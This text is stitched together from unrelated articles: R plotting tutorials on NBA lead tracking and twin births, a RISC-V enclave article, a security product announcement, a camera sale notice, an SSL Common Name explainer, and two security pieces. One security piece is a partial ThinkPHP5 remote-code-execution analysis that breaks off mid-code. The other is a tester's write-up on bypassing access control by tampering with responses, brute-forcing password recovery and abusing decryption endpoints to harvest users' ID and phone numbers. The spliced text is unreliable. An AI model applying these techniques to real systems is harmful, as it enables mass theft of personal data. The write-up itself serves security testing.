
Recreating the NBA lead tracker graphic


(This article was first published on R Statistical Odds & Ends, and kindly contributed to R-bloggers)

For each NBA game, nba.com has a really nice graphic which tracks the point differential between the two teams throughout the game. Here is the lead tracker graphic for the game between the LA Clippers and the Phoenix Suns on 10 Dec 2018:



Taken from https://www.nba.com/games/20181210/LACPHX#/matchup

I thought it would be cool to try recreating this graphic with R. You might ask: why try to replicate something that exists already? If we are able to pull out the data underlying this graphic, we could do much more than just replicate what is already out there; we have the power to make other visualizations which could be more informative or powerful. (For example, what does this chart look like for all games that the Golden State Warriors played in? Or for each quarter of a game?)

The full R code for this post can be found here. For a self-contained script that accepts a game ID parameter and produces the lead tracker graphic, click here.

First, we load the packages that we will use:

library(lubridate)
library(rvest)
library(stringr)
library(tidyverse)

We can get play-by-play data from Basketball-Reference.com (here is the link for the LAC @ PHX game on 2018-12-10). Here is a snippet of the play-by-play table on that webpage; we would like to extract the columns in red:



Play-by-play data from basketball-reference.com.

The code below extracts the webpage, then pulls out rows from the play-by-play table:

# get webpage
url <- paste0("https://www.basketball-reference.com/boxscores/pbp/",
              current_id, ".html")
webpage <- read_html(url)

# pull out the events from the play-by-play table
events <- webpage %>%
    html_nodes("#pbp") %>%
    html_nodes("tr") %>%
    html_text()

events is a character vector that looks like this:


We would really like to pull out the data in the boxes above. Timings are easy enough to pull out with regular expressions (e.g. start of the string: at least 1 digit, then :, then at least one digit, then ., then at least one digit). Pulling out the score is a bit trickier: we can’t just use the regular expression denoting a dash with a number on each side. An example of why that doesn’t work is in the purple box above. Whenever a team scores, basketball-reference.com puts a “+2” or “+3” on the left or right of the score, depending on which team scored. In events, these 3 columns get smushed together into one string. If the team on the left scores, pulling out number-dash-number will give the wrong value (e.g. the purple box above would give 22-2 instead of 2-2).
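To see the failure concretely, here is a minimal sketch (the smushed string is a made-up stand-in for one of those rows):

library(stringr)

# "+2" for the left team and the score "2-2" get smushed into one string
smushed <- "+22-2"
str_extract(smushed, "\\d+-\\d+")   # returns "22-2", not "2-2"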



To avoid this issue, we extract the “+”s that may appear on either side of the score. In fact, this has an added advantage: we only need to extract a score if it is different from the previous timestamp, so we only have to keep the scores which have a “+” on either side. We then post-process the scores.

# get event times & scores
times <- str_extract(events, "^\\d+:\\d+.\\d+")
scores <- str_extract(events, "[\\+]*\\d+-\\d+[\\+]*")
scores <- ifelse(str_detect(scores, "\\+"), scores, NA)
df <- data.frame(time = times, score = scores,
                 stringsAsFactors = FALSE) %>%
    na.omit()

# remove the +'s
parseScore <- function(x) {
    if (startsWith(x, "+")) {
        return(str_sub(x, 3, str_length(x)))
    } else if (endsWith(x, "+")) {
        return(str_sub(x, 1, str_length(x) - 1))
    } else {
        return(x)
    }
}
df$score <- sapply(df$score, parseScore)

Next, we split the score into visitor and home score and compute the point differential (positive means the visitor team is winning):

# split score into visitor and home score, get home advantage
df <- df %>%
    separate(score, into = c("visitor", "home"), sep = "-") %>%
    mutate(visitor = as.numeric(visitor),
           home = as.numeric(home),
           time = ms(time)) %>%
    mutate(visitor_adv = visitor - home)

Next we need to process the timings. Each of the 4 quarters lasts for 12 minutes, while each overtime period (if any) lasts for 5 minutes. The time column shows the amount of time remaining in the current period. We will amend the times so that they show the time elapsed (in seconds) from the start of the game. This notion of time makes it easier for plotting, and works for any number of overtime periods as well.

# get period of play (e.g. Q1, Q2, ...)
df$period <- NA
period <- 0
prev_time <- ms("0:00")
for (i in 1:nrow(df)) {
    curr_time <- df[i, "time"]
    if (prev_time < curr_time) {
        period <- period + 1
    }
    df[i, "period"] <- period
    prev_time <- curr_time
}

# convert time such that it runs upwards. regular quarters are 12M long, OT
# periods are 5M long
df <- df %>%
    mutate(time = ifelse(period <= 4,
                         as.duration(12 * 60) - as.duration(time),
                         as.duration(5 * 60) - as.duration(time))) %>%
    mutate(time = ifelse(period <= 4,
                         time + as.duration(12 * 60 * (period - 1)),
                         time + as.duration(12 * 60 * 4) +
                             as.duration(5 * 60 * (period - 5))))

At this point, we have enough to make crude approximations of the lead tracker graphic:

ggplot() +
    geom_line(data = df, aes(x = time, y = visitor_adv)) +
    labs(title = "LAC @ PHX, 2018-12-10") +
    theme_minimal() +
    theme(plot.title = element_text(size = rel(1.5), face = "bold",
                                    hjust = 0.5))
ggplot() +
    geom_step(data = df, aes(x = time, y = visitor_adv)) +
    labs(title = "LAC @ PHX, 2018-12-10") +
    theme_minimal() +
    theme(plot.title = element_text(size = rel(1.5), face = "bold",
                                    hjust = 0.5))

Getting the fill colors that NBA.com’s lead tracker has requires a bit more work. We need to split visitor_adv into two columns: the visitor’s lead (0 if they are behind) and the home team’s lead (0 if they are behind). We can then draw the chart above and below the x-axis as two geom_ribbons. (It’s a little more complicated than that; see this StackOverflow question and this gist for details.) Colors were obtained using imagecolorpicker.com.

df$visitor_lead <- pmax(df$visitor_adv, 0)
df$home_lead <- pmin(df$visitor_adv, 0)

df_extraSteps <- df %>%
    mutate(visitor_adv = lag(visitor_adv),
           visitor_lead = lag(visitor_lead),
           home_lead = lag(home_lead))

df2 <- bind_rows(df_extraSteps, df) %>%
    arrange(time)

ggplot() +
    geom_ribbon(data = df2, aes(x = time, ymin = 0, ymax = visitor_lead),
                fill = "#F7174E") +
    geom_ribbon(data = df2, aes(x = time, ymin = home_lead, ymax = 0),
                fill = "#F16031") +
    labs(title = "LAC @ PHX, 2018-12-10") +
    theme_minimal() +
    theme(plot.title = element_text(size = rel(1.5), face = "bold",
                                    hjust = 0.5))

Almost there! The code below touches up the figure, giving it the correct y-axis limits as well as vertical lines marking the end of each period.

# get score differential range (round to nearest 5)
ymax <- round(max(df$visitor_adv) * 2, digits = -1) / 2
ymin <- round(min(df$visitor_adv) * 2, digits = -1) / 2

# get period positions and labels
periods <- unique(df$period)
x_value <- ifelse(periods <= 4,
                  12 * 60 * periods,
                  12 * 60 * 4 + 5 * 60 * (periods - 4))
x_label <- ifelse(periods <= 4,
                  paste0("Q", periods),
                  paste0("OT", periods - 4))

ggplot() +
    geom_ribbon(data = df2, aes(x = time, ymin = 0, ymax = visitor_lead),
                fill = "#F7174E") +
    geom_ribbon(data = df2, aes(x = time, ymin = home_lead, ymax = 0),
                fill = "#F16031") +
    geom_vline(aes(xintercept = x_value), linetype = 2, col = "grey") +
    scale_y_continuous(limits = c(ymin, ymax)) +
    labs(title = "LAC @ PHX, 2018-12-10") +
    scale_x_continuous(breaks = x_value, labels = x_label) +
    theme_minimal() +
    theme(plot.title = element_text(size = rel(1.5), face = "bold",
                                    hjust = 0.5),
          axis.title.x = element_blank(),
          panel.grid.minor.x = element_blank(),
          panel.grid.minor.y = element_blank())

The figure above is what we set out to plot. However, since we have the underlying data, we can now make plots of the same data that may reveal other trends (code at the end of this R file ). Here are the line and ribbon plots where we look at the absolute score rather than the point differential:



Here, we add points to the line plot to indicate whether a free throw, 2-pointer, or 3-pointer was scored:



ThinkPHP5 Remote Command Execution Vulnerability Analysis

Preface

ThinkPHP recently patched a serious remote code execution vulnerability. The root cause is that the framework does not sufficiently validate the controller name, so when forced routing is not enabled, an attacker can construct a malicious request that executes commands remotely. Affected versions include 5.0 and 5.1.

Test environment:

ThinkPHP 5.1 beta + win10 64bit + wamp

Vulnerability Analysis

There are already some write-ups online, so I will walk through the vulnerability forward from the entry point. The call chain and code differ slightly across ThinkPHP versions; this post analyzes the ThinkPHP 5.1 beta code, and other versions can be analyzed analogously.

First, thinkphp/library/think/App.php is loaded and its run function executes:

public function run()
{
    // initialize the application
    $this->initialize();

    try {
        if (defined('BIND_MODULE')) {
            // module/controller binding
            BIND_MODULE && $this->route->bindTo(BIND_MODULE);
        } elseif ($this->config('app.auto_bind_module')) {
            // automatic binding from the entry file
            $name = pathinfo($this->request->baseFile(), PATHINFO_FILENAME);
            if ($name && 'index' != $name && is_dir($this->appPath . $name)) {
                $this->route->bindTo($name);
            }
        }

        $this->request->filter($this->config('app.default_filter'));

        // read the default language
        $this->lang->range($this->config('app.default_lang'));
        if ($this->config('app.lang_switch_on')) {
            // multi-language support enabled: detect the current language
            $this->lang->detect();
        }
        $this->request->langset($this->lang->range());

        // load the system language pack
        $this->lang->load([
            $this->thinkPath . 'lang/' . $this->request->langset() . '.php',
            $this->appPath . 'lang/' . $this->request->langset() . '.php',
        ]);

        // get the application dispatch information
        $dispatch = $this->dispatch;
        if (empty($dispatch)) {
            // perform URL route detection
            $dispatch = $this->routeCheck($this->request);
        }

        // record the current dispatch information
        $this->request->dispatch($dispatch);

        // log route and request information
        if ($this->debug) {
            $this->log('[ ROUTE ] ' . var_export($this->request->routeinfo(), true));
            $this->log('[ HEADER ] ' . var_export($this->request->header(), true));
            $this->log('[ PARAM ] ' . var_export($this->request->param(), true));
        }

        // listen for app_begin
        $this->hook->listen('app_begin', $dispatch);

        // request cache check
        $this->request->cache(
            $this->config('app.request_cache'),
            $this->config('app.request_cache_expire'),
            $this->config('app.request_cache_except')
        );

        // execute the dispatch
        $data = $dispatch->run();
    } catch (HttpResponseException $exception) {
        $data = $exception->getResponse();
    }

    // send data to the client
    if ($data instanceof Response) {
        $response = $data;
    } elseif (!is_null($data)) {
        // auto-detect the response output type
        $isAjax = $this->request->isAjax();
        $type = $isAjax
            ? $this->config('app.default_ajax_return')
            : $this->config('app.default_return_type');
        $response = Response::create($data, $type);
    } else {
        $response = Response::create();
    }

    // listen for app_end
    $this->hook->listen('app_end', $response);

    return $response;
}

Step into routeCheck, the function that performs route detection:

public function routeCheck()
{
    $path = $this->request->path();
    $depr = $this->config('app.pathinfo_depr');

    // route detection
    $files = scandir($this->routePath);
    foreach ($files as $file) {
        if (strpos($file, '.php')) {
            $filename = $this->routePath . DIRECTORY_SEPARATOR . $file;
            // import the route configuration
            $rules = include $filename;
            if (is_array($rules)) {
                $this->route->import($rules);
            }
        }
    }

    $must = !is_null($this->routeMust)
        ? $this->routeMust
        : $this->config('app.url_route_must');

    // route detection (returns a different URL dispatch depending on the route definition)
    return $this->route->check($path, $depr, $must);
}

routeCheck in turn calls the path function; let's step into it.



It is defined in thinkphp/library/think/Request.php:

public function path()
{
    if (is_null($this->path)) {
        $suffix   = $this->config->get('url_html_suffix');
        $pathinfo = $this->pathinfo();
        if (false === $suffix) {
            // pseudo-static access disabled
            $this->path = $pathinfo;
        } elseif ($suffix) {
            // strip the normal URL suffix
            $this->path = preg_replace('/\.(' . ltrim($suffix, '.') . ')$/i', '', $pathinfo);
        } else {
            // allow any suffix
            $this->path = preg_replace('/\.' . $this->ext() . '$/i', '', $pathinfo);
        }
    }
    return $this->path;
}

The pathinfo method here is also defined in Request.php:

public function pathinfo()
{
    if (is_null($this->pathinfo)) {
        if (isset($_GET[$this->config->get('var_pathinfo')])) {
            // check whether the URL contains the compatibility-mode parameter
            $_SERVER['PATH_INFO'] = $_GET[$this->config->get('var_pathinfo')];
            unset($_GET[$this->config->get('var_pathinfo')]);
        } elseif ($this->isCli()) {
            // CLI mode: index.php module/controller/action/params/...
            $_SERVER['PATH_INFO'] = isset($_SERVER['argv'][1]) ? $_SERVER['argv'][1] : '';
        }

        // analyze the PATHINFO information
        if (!isset($_SERVER['PATH_INFO'])) {
            foreach ($this->config->get('pathinfo_fetch') as $type) {
                if (!empty($_SERVER[$type])) {
                    $_SERVER['PATH_INFO'] = (0 === strpos($_SERVER[$type], $_SERVER['SCRIPT_NAME']))
                        ? substr($_SERVER[$type], strlen($_SERVER['SCRIPT_NAME']))
                        : $_SERVER[$type];
                    break;
                }
            }
        }

        $this->pathinfo = empty($_SERVER['PATH_INFO']) ? '/' : ltrim($_SERVER['PATH_INFO'], '/');
    }
    return $this->pathinfo;
}

From this we can see that $this->config->get('var_pathinfo') defaults to s (var_pathinfo is hard-coded in config/app.php), so we can use $_GET['s'] to pass the routing information.
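For illustration, ThinkPHP's compatibility mode carries the whole route in the s query parameter; the host and the module/controller/action below are placeholders:

# these two requests are routed identically by ThinkPHP
curl "http://target.example/index.php/index/index/index"
curl "http://target.example/index.php?s=index/index/index"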

Back in thinkphp/library/think/App.php, execution reaches the dispatch step.



This is an instance of the run function in thinkphp/library/think/route/dispatch/Module.php:

class Module extends Dispatch
{
    public function run()
    {
        $result = $this->action;
        if (is_string($result)) {
            $result = explode('/', $result);
        }

        if ($this->app->config('app.app_multi_module')) {
            // multi-module deployment
            $module = strip_tags(strtolower($result[0] ?: $this->app->config('app.default_module')));
            $bind = $this->app['route']->getBind();
            $available = false;

            if ($bind && preg_match('/^[a-z]/is', $bind)) {
                // bound module
                list($bindModule) = explode('/', $bind);
                if (empty($result[0])) {
                    $module = $bindModule;
                    $available = true;
                } elseif ($module == $bindModule) {
                    $available = true;
                }
            } elseif (!in_array($module, $this->app->config('app.deny_module_list'))
                && is_dir($this->app->getAppPath() . $module)) {
                $available = true;
            }

            // module initialization
            if ($module && $available) {
                // initialize the module

Logic Flaws That Broke Me: Sharing Some Access-Control Bypass Techniques

0x00 Foreword

This post covers three approaches to unauthorized-access testing, each paired with a real case study. These are testing experiences accumulated in my day-to-day work that seemed worth sharing; they may not dig terribly deep into any one problem, but I hope the ideas prove useful.

0x01 Bypassing Authorization by Modifying the Response Packet

Background

The scenario for the "modify the response packet" bypass is an application that encrypts its requests: during testing, nearly every request was encrypted while the responses came back in plaintext. In that setup you can test for unauthorized access the way the following case does.

Case Study

The "My Account" feature shows the information for every account linked to the current one, and from a card's detail view you can reach "Account Details" plus several other functions such as transaction history and balances. We'll take "Account Details" as the example.



First, select "My Account". Every POST request in this system is encrypted the same way, as shown below, with RSA as the only parameter.

POST /users/cardcenter.do HTTP/1.1
HOST: 1.1.1.1

RSA=WEFGH%^UYBF&HF)WHG($@hh9h9HG)FKJHSKGBGIEBUGIBG(&S(GHEW(*GHHG)))

The response, however, comes back in plaintext, because the front end has to pull the useful fields out of the previous request's JSON to render the page.

And that is exactly where the problem lies: the next request, "Account Details", queries data directly with the card number taken from the front-end tag's value. So by modifying the content of the previous response, we lay the groundwork for a horizontal privilege escalation in the next request.

The original "My Account" request:

POST /users/cardcenter.do HTTP/1.1
HOST: 1.1.1.1

RSA=ERfiegiue478y784goehghoHIGUIUUg*^&^(*^%fdfgsg)

The original "My Account" response:

{"body":{"Name":"王刚","cardNO":"12345678","value":"24.33","Address":"北京市朝阳区亮马桥","tel":"13333333333"}} 将返回包中的cardNO参数“12345678”修改为其他账号“62308452”,则在前端显示修改后的账号。

Selecting the "Account Details" sub-function of "My Account" again (the request itself is encrypted), the content of the response shows that the horizontal privilege escalation succeeded:

{"body":{"Name":"郭德岗","cardNO":"222222","Type":"CNY","calType":"001","bankAddr":"2334","cardValue":"24.33","Address":"北京市朝阳区亮马桥","tel":"13333333333"}{"sublist":"2222220102","cardValue":"1000.00"}

The impact in this case is horizontal unauthorized reads: with the method above you can query other people's card numbers, ID numbers, and phone numbers.

Elsewhere in the same application, one function could be abused in the same way to pay fees with someone else's bank card. (PS: I can't find the screenshots anymore, so I can't piece that part together. Em...)

0x02 Finding a Decryption Endpoint

Background

The application in this case differs from the previous one: requests are not encrypted. POST parameters go out without any encryption or obfuscation, the response format is uniform, and the parameter values in responses are encrypted; that is, fields the front end needs come back as plaintext, while every other parameter is displayed as ciphertext.


Case Study

On this application's forgot-password flow, after you submit your login name (an ID number or username), the response returns part of your information.


Password recovery by ID number

Trying password recovery with an ID number as the login name, the response returns the "name" and "contact number" in plaintext, with the other fields empty, as shown:


Password recovery by username

Trying password recovery with a username as the login name, the response carries the same information as the ID-number flow, including "name", "phone", and "ID number". But usernames are much easier to exploit than ID numbers: there are plenty of common top-500 and top-100 username lists, so a brute-force run can harvest a large amount of information.


The problem: how to decrypt

You probably noticed, though, that everything in the response is obfuscated and encrypted. So how do we decrypt the data? That is the question.

But in the next step, "identity verification", when the SMS code is checked, the request submits all the ciphertexts obtained by the previous query, and, astonishingly, the plaintext of the "phone number" parameter turned up in the JS code of the response. So why not try putting other parameters in that position? Bingo!



As shown below, submitting the name parameter's ciphertext in that position returned its plaintext.

To sum up: you can first brute-force the forgot-password endpoint and collect all the returned ciphertexts, then brute-force the parameter slot during identity verification to recover the plaintext behind every ciphertext. In this way, every user's ID number, phone number, name, and username can be harvested in full.

By analogy, if you come across an interface that accepts ciphertext from a request and returns something decryptable, the same approach may well apply.

0x04 Making an Encrypted Request Throw Errors

Case Study

When testing some systems, the request body is JSON in an essentially fixed format like the example below, with the actual request data encrypted and obfuscated inside the data field.


POST /hello.do HTTP/1.1
Host: 127.0.0.1

{"_zh":"1324","data":"QWERT+YHFGGi+fgfyefgyef+6/"}

Ideas to try:

Like case one, look for a decryption endpoint that turns ciphertext back into plaintext; but here there is no way to recover the full parameter format of a request, so this idea is a dead end.
Alternatively, craft a malformed data parameter and reconstruct a complete request from the error messages it provokes.

Trying the second idea

Find another information-query endpoint and splice its request body into this one. Since the endpoints differ, the server should produce an error; watch whether the response can be parsed and what error comes back.

First, a normal request and response for this endpoint look like the following screenshot:



After replacing the datas portion of this request with the datas from another function's request, the response was exactly what we wanted:



Analyzing the screenshot above:

The plaintext behind the original datas ciphertext was probably: {"name":"test1","ID":"123456","phone":"13333333333"}

The malformed ciphertext request was probably: {"token":"234567890"}

The parameter names in the latter JSON do not match what this endpoint expects, so the back end cannot run the query and returns an error complaining about missing parameters, naming them explicitly. The net result is that we learn exactly which parameters this endpoint's JSON must contain, so we can construct a plaintext request that fully matches a normal one.

Based on that, the constructed plaintext JSON request looks like the following. Will the back end actually parse it?



The result is equally clear: the back end accepts and parses the plaintext JSON request:

Plaintext request

Encrypted request

Takeaways

Two takeaways from this scenario:

Can the endpoint accept a plaintext request and return a plaintext response? (Avoid the case where a plaintext request still gets a ciphertext response.)
Can you read valid parameter names straight out of the error messages? That removes a lot of the guesswork otherwise needed when constructing parameter names.

0x05 Summary

The above is a write-up of situations I have run into in day-to-day testing; I hope some of it is of use.

RISC-V Will Stop Hackers Dead From Getting Into Your Computer


The greatest hardware hacks of all time were simply the result of finding software keys in memory. The AACS encryption debacle ― the 09 F9 key that allowed us to decrypt HD DVDs ― was the result of encryption keys just sitting in main memory, where they could be read by any other program. DeCSS, the hack that gave us all access to DVDs, was again the result of encryption keys sitting out in the open.

Because encryption doesn’t work if your keys are just sitting out in the open, system designers have come up with ingenious solutions to prevent evil hackers from accessing these keys. One of the best solutions is the hardware enclave, a tiny bit of silicon that protects keys and other bits of information. Apple has an entire line of chips, Intel has hardware extensions, and all of these are black box solutions. They do work, but we have no idea if there are any vulnerabilities. If you can’t study it, it’s just an article of faith that these hardware enclaves will keep working.

Now, there might be another option. RISC-V researchers are busy creating an Open Source hardware enclave . This is an Open Source project to build secure hardware enclaves to store cryptographic keys and other secret information, and they’re doing it in a way that can be accessed and studied. Trust but verify, yes, and that’s why this is the most innovative hardware development in the last decade.

What is an enclave?

Although often thought of as a new technology, processor enclaves have been around for ages. The first one to reach the public consciousness would be the Secure Enclave Processor (SEP) found in the iPhone 5S. This generation of iPhone introduced several important technological advancements, including Touch ID, the innovative and revolutionary M7 motion coprocessor, and the SEP security coprocessor itself. The iPhone 5S was a technological milestone, and the then-new SEP stored fingerprint data and cryptographic keys beyond the reach of the actual SOC found in the iPhone.

The iPhone 5S SEP was designed to perform secure services for the rest of the SOC, primarily relating to the Touch ID functionality. Apple’s revolutionary use of a secure enclave processor was extended with the 2016 release of the Touch Bar MacBook Pro and the use of the Apple T1 chip. The T1 chip was again used for TouchID functionality, and demonstrates that Apple is the king of vertical integration.

But Apple isn’t the only company working on secure enclaves for their computing products. Intel has developed the SGX extension which allows for hardware-assisted security enclaves. These enclaves give developers the ability to hide cryptographic keys and the components for digital rights management inside a hardware-protected bit of silicon. AMD, too, has hardware enclaves with the Secure Encrypted Virtualization (SEV). ARM has Trusted Execution environments. While the Intel, AMD, and ARM enclaves are bits of silicon on other bits of silicon ― distinct from Apple’s approach of putting a hardware enclave on an entirely new chip ― the idea remains the same. You want to put secure stuff in secure environments, and enclaves allow you to do that.

Unfortunately, these hardware enclaves are black boxes, and while they do provide a small attack surface, there are problems. AMD’s SEV is already known to have serious security weaknesses , and it is believed SEV does not offer protection from malicious hypervisors, only from accidental hypervisor vulnerabilities. Intel’s Management engine, while not explicitly a hardware enclave, has been shown to be vulnerable to attack . The problem is that these hardware enclaves are black boxes, and security through obscurity does not work at all.

The Open Source Solution

At last week’s RISC-V Summit, researchers at UC Berkeley released their plans for the Keystone Enclave, an Open Source secure enclave based on RISC-V (PDF). Keystone is a project to build a Trusted Execution Environment (TEE) with secure hardware enclaves based on the RISC-V architecture, the same architecture that’s going into completely Open Source microcontrollers and (soon) Systems on a Chip.


The goals of the Keystone project are to build a chain of trust, starting from a silicon Root of Trust stored in tamper-proof hardware. This leads to a zeroth-stage bootloader and a tamper-proof platform key store. Defining a hardware Root of Trust (RoT) is exceptionally difficult; you can always decapsulate silicon, you can always perform some sort of analysis on a chip to extract keys, and if your supply chain isn’t managed well, you have no idea if the chip you’re basing your RoT on is actually the chip in your computer. However, by using RISC-V and its Open Source HDL, this RoT can at least be studied, unlike the black box solutions from Intel, AMD, and ARM.

The current plans for Keystone include memory isolation, an open framework for building on top of this security enclave, and a minimal but Open Source solution for a security enclave.



Right now, the Keystone Enclave is testable on various platforms, including QEMU, FireSim, and on real hardware with the SiFive Unleashed. There’s still much work to do, from formal verification to building out the software stack, libraries, and adding hardware extensions.

This is a game changer for security. Silicon vendors and designers have been shoehorning in hardware enclaves into processors for nearly a decade now, and Apple has gone so far as to create their own enclave chips. All of these solutions are black boxes, and there is no third-party verification that these designs are inherently correct. The RISC-V project is different, and the Keystone Enclave is the best chance we have for creating a truly Open hardware enclave that can be studied and verified independently.

Threat Stack Introduces Bulk Data Export Feature


One of the biggest benefits of the Threat Stack Cloud Security Platform is the deep level of visibility we bring to observing operator behaviors in customers’ cloud runtime environments. We frame this discussion in terms of “security observability,” and it can be distilled into a single question: “If suspicious or risky behaviors occur on one of your servers, what can you see and how quickly can you see it?”

Security observability is here

Reducing this mean-time-to-know metric (MTTK) for Security and DevOps teams to a matter of minutes ― as opposed to hours or days spent digging through logs ― is when the Threat Stack platform truly shines. With this goal of saving our customers time, and surfacing security risks and threats as quickly and as easily as possible, we designed our rules-based alerting engine as a first-class citizen of the platform.

Due to the breadth and depth of event data that we aggregate, we haven’t made the entirety of these datasets available to customers historically. While real-time, rules-based security alerting is our primary focus, we recognize that many of our customers with sophisticated digital forensics, data analytics, and compliance needs want to get as much data as they can out of our platform.

The [data] is out there

In the first quarter of 2019 we will be giving our customers the ability to export all host OS events and file integrity monitoring (FIM) events out of Threat Stack and into their own Amazon S3 buckets. This new feature will make it much easier to get more contextualized data out of Threat Stack.

The format of the data will be no surprise: JSON that’s rich in additional context, just like the event data that’s surfaced when drilling down into Threat Stack alerts. Now, for all event data, even if it never triggers an alert ― typically 99% of data in a well-tuned environment ― customers will be able to efficiently get bulk exports in regular batches to S3.

Once the data lands in a customer’s S3 bucket, there are abundant use cases for integration:

Reporting and visualization workflows: Incorporate Threat Stack data into advanced analytics and threat hunting
Security information and event management (SIEM) tools: Aggregate Threat Stack events alongside data from other infrastructure monitoring and orchestration systems
Cold storage: Persist Threat Stack data long term, in services like Amazon Glacier , to meet advanced compliance requirements

Using the new data portability feature is totally optional. For teams that need this level of detail and long-term data retention, however, the ability to export Threat Stack’s high-fidelity telemetry to S3 will be a simple and efficient way to access large amounts of rich data.

We formally announced this news in a press release , which you can check out for more industry context and expert quotations. Existing Threat Stack customers can also contact their account management teams to learn how they can get started with S3 data portability.

We can’t wait to hear about the new ways customers and partners are deriving value from additional Threat Stack data. Until then!

[Update: Down to $259] Arlo Pro (first-gen) security camera 2-pack on sale for $ ...


Keeping a watchful eye on all areas of your home can be hard when power outlets aren't always available. There are battery-powered security cameras to help with that, and the best we've ever tested are the Arlo Pros. The first-gen Arlo Pro is on sale right now―the two-pack is about $275, which is the lowest price yet.

The Arlo Pro cameras have a rechargeable battery that lasts several months, but actual longevity depends on how much movement it sees. Your footage gets uploaded to the cloud and saved for one week free of charge. The system's dedicated wireless camera hub also has USB ports so you can save every video captured by the system. The Arlo Pro 2 moved from 720p to 1080p, but the video is a bit darker. Depending on where you want to put the cameras, the first-gen might be better for you.



Arlos come in various multi-camera packs, but the base-model first-gen two-pack started at more than $400. It hasn't sold for that much in months, but the current $274.99 price tag is still about $75 below where it was a few weeks ago. The sale is valid at Walmart, Best Buy, and Amazon.

Update 1 (2018/12/13 8:20am PST, by Ryan Whitwam): Price drop

The 2-camera set has dropped again to $259―about $16 less than it was before. You can get that price at Amazon and Walmart. Best Buy is a few dollars more still.



End of Update

Source: Walmart , Best Buy , Amazon

Twins on the up


(This article was first published on HighlandR, and kindly contributed to R-bloggers)

Are multiple births on the increase?

My twin boys turned 5 years old today. Wow, time flies. Life is never dull, because twins are still seen as something of a novelty, so wherever we go, we find ourselves in conversation with strangers, who are intrigued by the whole thing.

In order to save time if we ever meet, here’s some FAQ’s:

No, they’re not identical
Yes, I’m sure
No, they do not have similar personalities
They like different things
One likes Hulk and Gekko, the other likes Iron Man and Catboy.

Recently I’ve been hearing and seeing anecdotal evidence that twins and multiple births are on the increase. I tried to find some data for Scotland, and while there is a lot of information on births in Scotland available, I couldn’t find breakdowns of multiple births.

However, I did find some information for England and Wales, so let’s look at that.

In this next bit, the key thing that may be of interest is the use of tidyr::gather.

There has been some discussion on #rstats Twitter about things people struggle with and a surprising amount of people struggle to remember the syntax for tidyr’s gather and spread.

(I can neither confirm nor deny that I am one of them.)

The data was found here

library(readxl)
library(dplyr)
library(tidyr)
library(ggplot2)

data <- read_xls("birthcharacteristicsworkbook2016.xls",
                 sheet = "Table 11", range = "A10:I87")

data <- data %>%
    rename(Year = X__1,
           All_ages = `All maternities with multiple births`,
           Under20 = X__2,
           `20_to_24` = X__3,
           `25_to_29` = X__4,
           `30_to_34` = X__5,
           `35_to_39` = X__6,
           `40_to_44` = X__7,
           `45_and_over` = X__8)

# the 1981 data is borked, so ignore that

Note use of gather to combine all the age groups into an age_group variable.

We use the Year column as an index so we have an entry for every age group, for every year, with the value represented as ‘maternities’.
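As a minimal reminder of the wide-to-long pattern used below (toy data, not the birth dataset):

library(tidyr)

wide <- data.frame(Year = c(2000, 2001),
                   Under20 = c(1, 2),
                   `20_to_24` = c(3, 4),
                   check.names = FALSE)

# wide -> long: stack every column except Year into key/value pairs
long <- gather(wide, key = age_group, value = maternities, -Year)

# and back again: long -> wide
spread(long, key = age_group, value = maternities)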

Back to the code:

long_data <- data %>%
    filter(Year != "1981") %>%
    gather(key = age_group, value = "maternities", -Year)

long_data$Year <- as.numeric(long_data$Year)
long_data$age_group <- forcats::as_factor(long_data$age_group)
long_data$maternities <- as.numeric(long_data$maternities)

ggplot(long_data, aes(Year, maternities), group = age_group) +
    geom_line() +
    geom_point() +
    facet_wrap(vars(age_group), scales = "free_y") +
    ggtitle(label = "England and Wales maternities with multiple births - numbers",
            subtitle = "By age of mother, 1940 to 2016") +
    labs(x = NULL, y = "Multiple maternities")
# Let's do rates
rates <- read_xls("birthcharacteristicsworkbook2016.xls",
                  sheet = "Table 11", range = "A89:I166")

rates <- rates %>%
    rename(Year = X__1,
           All_ages = `All maternities with multiple births per 1,000 all maternities`,
           Under20 = X__2,
           `20_to_24` = X__3,
           `25_to_29` = X__4,
           `30_to_34` = X__5,
           `35_to_39` = X__6,
           `40_to_44` = X__7,
           `45_and_over` = X__8)

long_rates <- rates %>%
    filter(Year != 1981) %>%
    gather(key = age_group, value = "multiple_maternities_per_1000", -Year)

long_rates$Year <- as.numeric(long_rates$Year)
long_rates$age_group <- forcats::as_factor(long_rates$age_group)
long_rates$multiple_maternities_per_1000 <- as.numeric(long_rates$multiple_maternities_per_1000)

ggplot(long_rates, aes(Year, multiple_maternities_per_1000), group = age_group) +
    geom_line() +
    geom_point() +
    facet_wrap(vars(age_group)) +
    ggtitle(label = "England and Wales Rate of maternities with multiple births - per 1,000 all maternities",
            subtitle = "By age of mother, 1940 to 2016") +
    labs(x = NULL, y = "Multiple maternities")

When we look at maternities with multiple births as a rate per 1000 maternities, we see the increase in multiple births among older mothers, especially in the over 45 group.



Again, using free scales on the y-axis helps us see that almost all age groups are exhibiting an increase; compare the 20-24 age group as a rate and as a count, for example.



Looks to me that overall, the rate of multiple births is increasing.

What’s driving this?

Can it continue?

Will people ever stop asking us if the twins are identical?



What Is SSL Certificate CN (Common Name) and Usage?


Common Name, or CN, is generally used in SSL certificates. The CN defines the server name that will be used for the secure SSL connection. Generally, such an SSL certificate is used to secure the connection between an HTTP(S) server and a client browser like Chrome, Internet Explorer, or Firefox.

Common Name (CN)

The Common Name specifies the host or server identity. When a client tries to connect to a remote server such as an HTTP server, it first obtains that server's SSL certificate. It then compares the host name or domain name it wants to connect to with the Common Name provided in the SSL certificate. If they are the same, it uses the SSL certificate to encrypt the connection.

Technically, the Common Name is represented as the commonName field in the X.509 certificate specification, which is the specification SSL certificates follow.


Common Name (CN)

We can formulate the Common Name like below.

Common Name = Domain Name + Host Name
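For example, you can read the Common Name that a live server presents by using openssl (any reachable HTTPS host will do; poftut.com is just an example):

echo | openssl s_client -connect poftut.com:443 2>/dev/null | openssl x509 -noout -subject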

We can use the following domain and host names as a Common Name.

poftut.com
www.poftut.com
*.poftut.com

Fully Qualified Domain Name (FQDN)

Fully Qualified Domain Name, or FQDN, is used interchangeably with Common Name. A fully qualified name defines the host name in a strict manner. More details about the FQDN can be found in the following tutorial.

What is FQDN (Fully Qualified Domain Name) with Examples?

Organization Name

The Organization Name may be confused with the Common Name. The Organization Name is the name of the organization that owns the IT infrastructure. The Organization Name shouldn't be used as the Common Name; doing so will create security problems.

SSL Certificate

